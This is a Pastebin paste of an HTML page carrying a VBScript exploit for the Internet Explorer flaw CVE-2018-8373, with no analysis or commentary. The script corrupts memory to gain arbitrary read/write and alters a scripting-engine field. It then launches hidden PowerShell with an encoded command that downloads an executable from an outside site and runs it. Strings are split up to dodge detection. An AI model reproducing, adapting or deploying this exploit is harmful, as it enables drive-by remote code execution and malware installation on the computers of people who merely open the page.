physicaldrive0

CVE-2018-8373

Sep 26th, 2018
2,900
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!doctype html>
  2. <html lang="en">
  3. <head>
  4. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  5. <meta http-equiv="x-ua-compatible" content="IE=10">
  6. <meta http-equiv="Expires" content="0">
  7. <meta http-equiv="Pragma" content="no-cache">
  8. <meta http-equiv="Cache-control" content="no-cache">
  9. <meta http-equiv="Cache" content="no-cache">
  10. </head>
  11. <body>
  12. <script type="text/vbscript">
  13.  
  14. Dim max_col
  15. Dim index_vul
  16. Dim index_a
  17. Dim index_b
  18. Dim addr
  19. Dim array()
  20. Dim array2(0,6)
  21. Dim util_mem
  22. Dim fake_array
  23. Dim fake_str
  24.  
  25. Class Dummy
  26. End Class
  27.  
  28. Class ClassA
  29. private Sub Class_Initialize
  30. ReDim array(2)
  31. 'IsEmpty(array)
  32. End Sub
  33.  
  34. Public Default Property Get P
  35. ReDim Preserve array(100000)
  36.  
  37. For i = 0 To UBound(array2,2)
  38. array2(0,i) = 3
  39. Next
  40. For i = 0 To UBound(array)
  41. array(i) = array2
  42. Next
  43. P=&h0fffffff
  44. End Property
  45. End Class
  46.  
  47. Function rw_primit()
  48. array(index_vul)(index_a+2,0)=fake_array
  49. array(index_b)(0,2)=CDbl("1.740885"+"34731"+"324E-310")
  50.  
  51. array(index_vul)(index_a,0)=fake_str
  52. array(index_b)(0,0)=CDbl("6.365"+"98737437"+"801E-314")
  53.  
  54. util_mem=array(index_vul)(index_a,0)
  55. End Function
  56.  
  57. Function read
  58. read=LenB(array(index_vul)(index_a+2,0)(util_mem+8))
  59. End Function
  60.  
  61. Function GetUnlt32(addr)
  62. Dim value
  63. array(index_vul)(index_a+2,0)(util_mem+8)=addr +4
  64. array(index_vul)(index_a+2,0)(util_mem)=8
  65. value=read()
  66. array(index_vul)(index_a+2,0)(util_mem)=3
  67. GetUnlt32 = value
  68. End Function
  69.  
  70. Set cls = New ClassA
  71. array(2)=cls
  72.  
  73. IsEmpty(array)
  74.  
  75. max_col=&h0fffffff
  76.  
  77.  
  78. For i=0 To UBound(array)
  79. If UBound(array(i),1)-LBound(array(i),1)+1=max_col Then
  80. index_vul=i
  81. Exit For
  82. End If
  83. Next
  84.  
  85.  
  86.  
  87. For i=0 To UBound(array(index_vul),1)
  88. Dim type1 ,type2 ,type3 ,type4
  89. type1=VarType(array(index_vul)(i,0))
  90. type2=VarType(array(index_vul)(i+1,0))
  91. type3=VarType(array(index_vul)(i+3,0))
  92. type4=VarType(array(index_vul)(i+4,0))
  93. If(type1 = 2 And type2 = 2 And type3 = 3 And type4 = 3) Then
  94. index_a=i+3
  95. array(index_vul)(index_a,0)="AAAA"
  96. Exit For
  97. End If
  98. Next
  99.  
  100. For i=0 To UBound(array,1)
  101. If array(i)(0,0)=8 Then
  102. index_b=i
  103. Exit For
  104. End If
  105. next
  106.  
  107.  
  108.  
  109. Set dm = New Dummy
  110. Set array(index_vul)(index_a+4,0) = dm
  111. array(index_b)(0,4) = CDbl("6.3659"+"87374378"+"01E-314") '3
  112. addr=array(index_vul)(index_a+4,0)
  113.  
  114.  
  115. fake_array=Unescape("%u0001%u0"+"880%u000"+"1%u0000%u0"+"000%u0000%u000"+"0%u0000%uffff%u"+"7fff%u00"+"00%u0000")
  116. fake_str=Unescape("%u0000"+"%u0000%u"+"0000%u0000%u"+"0000%u0000"+"%u0000%"+"u0000")
  117. rw_primit()
  118.  
  119.  
  120. Dim psection
  121. psection = GetUnlt32(addr+&hc)
  122. dim a
  123. a=psection+4
  124.  
  125. Dim p_C0leScript
  126. p_C0leScript=GetUnlt32(a)
  127. a=p_C0leScript+&h174
  128. array(index_vul)(index_a+2,0)(a-8)=0
  129. Set Object = CreateObject("Sh"+"ell.Appl"+"ication")
  130. Object.ShellExecute "powe"+"rshel"+"l.ex"+"e -Window"+"Style Hi"+"dden -encod"+"edCo"+"mmand ""KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AeQBzAHcAYwBkAC4AYwBvAG0ALwB2AG8AbAAvAHMAMQAuAGUAeABlACcALAAgACcAYwA6AC8AdwBpAG4AZABvAHcAcwAvAHQAZQBtAHAALwBhAHQAdQBtADIAbAAuAGUAeABlACcAKQA7AGMAOgAvAHcAaQBuAGQAbwB3AHMALwB0AGUAbQBwAC8AYQB0AHUAbQAyAGwALgBlAHgAZQA="""
  131.  
  132. </script>
  133. </body>
  134. </html>
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×